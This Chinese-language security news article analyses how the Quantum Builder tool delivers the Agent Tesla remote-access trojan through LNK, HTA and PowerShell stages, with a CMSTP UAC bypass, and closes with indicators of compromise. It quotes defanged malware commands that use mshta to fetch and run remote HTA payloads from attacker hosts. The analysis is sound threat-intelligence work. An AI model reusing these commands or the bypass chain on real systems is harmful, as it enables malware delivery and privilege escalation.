freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Quantum 构建工具使用新的 TTP 投递 Agent Tesla
Avenger 2022-10-02 23:54:01 223566
所属地 北京

Zscaler 的研究人员发现暗网上正在出售名为 Quantum Builder 的构建工具,该工具可以投递 .NET 远控木马 Agent Tesla。与过去的攻击行动相比,本次攻击转向使用 LNK 文件。

Quantum Builder 能够创建恶意文件,如 LNK、HTA 与 PowerShell,最后投递 Agent Tesla。攻击者使用复杂的技术来生成 Payload:

使用 CMSTP 绕过用户账户控制,以便以管理权限执行最终 Payload 并关闭 Windows Defender

利用集成了无文件攻击等多种攻击向量的多阶段感染链

在内存中执行 PowerShell 脚本以进行逃避检测

打开诱饵分散受害者的注意力

后文对感染链进行了深入分析,并对 Quantum Builder 生成的 Payload 进行了比较。

感染链

感染链始于鱼叉邮件,其中包含一个携带 GZIP 文档的 LNK 文件。执行 LNK 文件后,嵌入的 PowerShell 代码会生成 MSHTA 来执行远程服务器上的 HTA 文件。

image.png-133.1kB感染链

HTA 文件解密 PowerShell 脚本,在执行 AES 解密和 GZIP 解压缩后解密并加载另一个 PowerShell 脚本。解密后的 PowerShell 脚本是一个 Downloader,通过远程服务器下载 Agent Tesla,再使用 CMSTP 绕过 UAC 以管理权限执行。

技术分析

鱼叉邮件的主题为订单确认,如下所示:

image.png-284.5kB鱼叉邮件

邮件带有一个 GZIP 文件作为附件,与带有 PDF 图标的恶意 LNK 文件捆绑在一起。执行后 LNK 文件会运行混淆的 PowerShell 代码,经过 base64 解编码与异或解密得到执行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta

image.png-181.9kB执行混淆代码

image.png-95.2kB通过 MSHTA 执行远程服务器上的 HTA 文件

HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。

image.png-87.5kBHTA 主要函数

解密出来的 PowerShell 脚本如下所示:

image.png-229.6kB解密 PowerShell 代码

解密完成后,恶意函数就会通过 CreateObject() 创建一个 Wscript.Shell 对象,然后通过 Run 方法执行解密后的 PowerShell 脚本。

image.png-249.5kBPowerShell 代码执行

解密的代码以隐藏窗口的形式执行,解密后会获取另一个 PowerShell 代码。

image.png-377.6kB执行新的 PowerShell 代码

IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码:

从远程服务器下载 Agent Tesla 的 Payload

执行 CMSTP 绕过 UAC

通过操作文件属性隐藏 Agent Tesla

Agent Tesla 被硬编码命名为 MuUQDuaFNoGmHQE.exe,并且被最终执行:

image.png-118.9kB解密 PowerShell 代码

解密可获取 Agent Tesla 的部署地址:

image.png-70.9kBURL 解密

image.png-126.3kB下载 Agent Tesla

通过 WriteAllBytes() 函数写入磁盘,路径为 C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe

image.png-48.2kB写入指定位置

Agent Tesla 二进制文件的路径作为参数传递给 PowerShell 脚本中的 CMSTP UAC Bypass 函数。该函数最初解码一个特别大的、base64 编码的数据块,如下所示:

image.png-692.3kBCMSTP UAC Bypass

解码后的代码是基于 PowerShell 的 CMSTP UAC Bypass PoC,在 GitHub上也能够找到。基于 PowerShell 的 CMSTP UAC 绕过 PoC 脚本在执行时会在 Temp 目录中写入恶意 INF 文件,其中 PowerShell 脚本中的 $CommandToExecute变量是 Agent Tesla 二进制文件的路径。

image.png-265.3kB恶意 INF 文件

将 INF 文件写入临时目录后,PowerShell 代码会生成一个新进程 cmstp.exe,并以 /au $InfFileLocation作为参数,然后安装恶意 INF 文件,如下所示:

image.png-31.8kB恶意 INF 文件作为参数执行 CMSTP

在 cmstp.exe 安装 INF 文件时,RunPreSetupCommandsSection 参数中的命令将以管理权限执行。该脚本将 [ENTER] 按键发送到活动的窗口应用程序,以便使用 SendKeys.SendWait() 函数自动执行。

image.png-14.4kB触发 UAC 绕过

当以恶意 INF 作为参数生成 cmstp.exe 时,就会以管理权限执行恶意软件,如下所示:

image.png-89.9kBUAC 绕过并以管理权限执行

Agent Tesla 的 C&C 服务器被配置为:

image.png-10kB配置信息

C&C 通信如下所示:

image.png-174.6kBC&C 通信

PowerShell 代码还通过操作隐藏文件属性来隐藏 Agent Tesla 二进制文件,如下所示:

image.png-74.1kB隐藏文件

攻击变化

感染链的另一个变种,LNK 文件被捆绑在 ZIP 压缩包中。通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA 文件。通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件,如下所示。

image.png-507kB通过 LNK 执行 HTA 文件

MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。

image.png-255.8kBHTA 文件解密 PowerShell 代码

除了 Run() 方法之外,在某些情况下,HTA 文件利用 ShellExecute() 方法执行 PowerShell 代码,如下所示:

image.png-366.1kB通过 ShellExecute() 执行代码

下载落地后,使用 Start-Process() 从 AppData 路径执行 Agent Tesla。如果 Payload 的扩展名为 .dll,则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。

image.png-447.7kB通过解密的 PowerShell 代码下载并执行 Agent Tesla

在某些情况下,还会有在内存中解密的 PowerShell 代码。代码使用 Invoke-Item 函数下载并执行了一个诱饵文件,以此来分散受害者的注意力,如下所示:

image.png-228.5kB诱饵执行

C&C 服务器的配置为:

image.png-10.3kB配置信息

C&C 通信如下所示:

image.png-235kBC&C 通信

Quantum

这些恶意文件都是由名为 Quantum Builder 的构建工具创建的,如下所示:

image.png-257.1kBQuantum Builder

HTA 生成工具

HTA 生成工具如下所示:

image.png-165.5kBHTA 生成工具

用户输入传递给 HTA Builder 函数以构造 HTA 文件,如下所示:

image.png-439.4kBHTA 生成工具

将此代码与之前分析的 HTA 代码比较,可以确定 Payload 是由 Quantum Builder 生成的。

image.png-121.9kB在野 HTA 文件

LNK 生成工具

LNK 生成工具如下所示:

image.png-118.9kBLNK 生成工具

快捷方式的构造参数有 Description、IconLocation、Target Path、Arguments 和 WindowStyle,如下所示:

image.png-365.1kBLNK 生成工具

将此代码与之前分析的 LNK 代码比较,可以确定 Payload 是由 Quantum Builder 生成的。

image.png-72.7kB在野 LNK 文件

LNK 构建工具还可以生成 ISO 文件的 Payload,如下所示:

image.png-72.9kBISO 生成工具

Quantum Builder 已被攻击者多次利用,部署了多个恶意软件家族:

RedLine Stealer

IcedID

GuLoader

RemcosRAT and AsyncRAT

结论

攻击者会不断更新技术手段,利用各种恶意软件进行攻击。本次使用的 Agent Tesla 是最新的,Quantum Builder 已经被应用在各种攻击活动中投递各种恶意样本。

IOC

3edfa0cf3b7d54c24013e4f0019dba20
bb914889d5edc6b56c666d2e44e1a437
1adc0bd494cd42578ac8c8e726d5ad92
31c341ad31224cc7d38a5c4e80ccb727
f931773a226809669cad91410a57267f
d9433faddcaca526b26f713e27e2505f
213ada506251c477480bd14ea5507bf3
0ebb9d422f8e86458d8fa7f66fe1d0f1
563fda5da81a5e7818d771222e81f6c4
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com

参考来源

Zscaler

# powershell # Quantum # HTA # lnk # Agent Tesla
本文为 Avenger 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Avenger LV.7
这家伙太懒了,还未填写个人描述!
  • 532 文章数
  • 178 关注者
利用 CVE-2024-21412 进行窃密的攻击激增
2024-07-28
滥用云服务进行传播的恶意软件越来越多
2024-07-03
详解 RisePro 信息窃密木马
2024-07-03
文章目录